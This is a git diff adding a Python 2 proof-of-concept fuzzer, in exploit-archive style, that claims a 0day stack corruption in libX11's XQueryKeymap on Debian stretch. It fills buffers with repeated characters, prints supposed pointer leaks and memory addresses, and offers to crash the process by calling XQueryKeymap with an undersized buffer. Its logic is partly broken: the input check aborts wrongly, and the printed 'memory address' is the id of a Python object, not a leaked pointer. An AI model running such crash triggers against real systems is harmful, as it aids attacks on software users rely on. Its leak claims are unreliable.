@@ -0,0 +1,94 @@
+# X11 (XQueryKeymap) Stack corruption (Possible Access violation) (Fuzzer)
+# Vulnerable (tested) library: libx11-6 / Version: 2:1.6.4-3
+# Debian package: libx11-6_1.6.4-3_amd64.deb (8ad41adbd147ffe4bf64c50efcac497b)
+# Tested at: Intel/x86_64 - Debian 4.9.25-1 (stretch)
+# 0day: 03/06/2017 - by psy (epsylon@riseup.net)
+import sys
+from ctypes import cast
+import ctypes as ct
+from ctypes.util import find_library
+x11 = ct.cdll.LoadLibrary(find_library("X11"))
+print ""
+print "#################################################################################"
+print "# X11/libX11.so.6 (XQueryKeymap) Stack corruption/Access violation <-> Fuzzer #"
+print "#------------------------------------------------------------------------------##"
+print "# Vulnerable (tested) library: libx11-6 / Version: 2:1.6.4-3 #"
+print "# Debian package: libx11-6_1.6.4-3_amd64.deb (8ad41adbd147ffe4bf64c50efcac497b) #"
+print "# Tested at: Intel/x86_64 - Debian 4.9.25-1 (stretch) #"
+print "#------------------------------------------------------------------------------##"
+print "# 0day: 03/06/2017 - by psy (epsylon@riseup.net) #"
+print "#################################################################################"
+print "\n-X11:", x11
+display = x11.XOpenDisplay(None)
+print "-Display:", display
+num = raw_input("\n[?] Enter fuzzing factor (ex: 256): ")
+if num == "":
+ num = 256
+ num = int(num)
+ print "\n[Error] Not a valid fuzzing factor. Aborting...\n"
+ sys.exit(2)
+dumped_map = []
+address_list = []
+print "\n[+] Fuzzing until: " + str(num) + "\n"
+for i in range(num+1):
+ keyboard = (ct.c_char * i)()
+ keyboard.value = "A" * i
+ keyboard_ptr = cast(keyboard, ct.c_char_p)
+ if keyboard.value is not keyboard_ptr.value:
+ print "Num chars:", str(i), "\n"
+ print " - Buffer:", keyboard.raw
+ print " - PTR cast:", keyboard_ptr.value
+ print " - Keyboard Map:", keyboard_ptr.value.split(keyboard.value)
+ print " - PTR LEAK:", keyboard_ptr.value.split(keyboard.value)[1]
+ ptr_leak = keyboard_ptr.value.split(keyboard.value)[1]
+ import struct
+ try:
+ le = (struct.unpack('<I', struct.pack('=I', 1))[0] == 1)
+ if le == True:
+ h = struct.unpack("<I", ptr_leak) # little endian
+ print "\n [!] struct.unpack PTR [little endian] is:", h
+ else:
+ h = struct.unpack(">I", ptr_leak) # big endian
+ print "\n [!] struct.unpack PTR [big endian] is:", h
+ a = hex(id(h))
+ print " [!] Memory address FOUND! -----> ", a, "\n"
+ if a not in address_list:
+ address_list.append(a)
+ except:
+ pass
+ dumped_map.append(str(i)+"="+str(keyboard_ptr.value.split(keyboard.value)[1]))
+ print "----"
+skip = raw_input("\n[?] Wanna skip map resume? (Y/n): ")
+if not skip:
+ skip = "y"
+if skip is not "y":
+ print "\n[+] Dumping map:\n\n", dumped_map
+ try:
+ f = open('dumped_map.out', 'w')
+ for d in dumped_map:
+ f.write(str(dumped_map))
+ f.close()
+ print "\n[!] Saved at file: dumped_map.out"
+ except:
+ pass
+print "\n-XQueryKeyMap:", x11.XQueryKeymap
+if address_list:
+ print "\n[!] Memory addresses found:\n"
+ for a in address_list:
+ print " -", a
+sf = raw_input("\n[?] Wanna try to generate a segmentation fault (core dumped) -> THIS WILL STOP THIS TOOL? (N/y): ")
+if not sf:
+ sf = "n"
+if sf is not "n":
+ print "\n[!] Calling to function: x11.XQueryKeymap\n"
+ keyboard = (ct.c_char * num)()
+ x11.XQueryKeymap(display, keyboard)
+ print "\nBye!\n"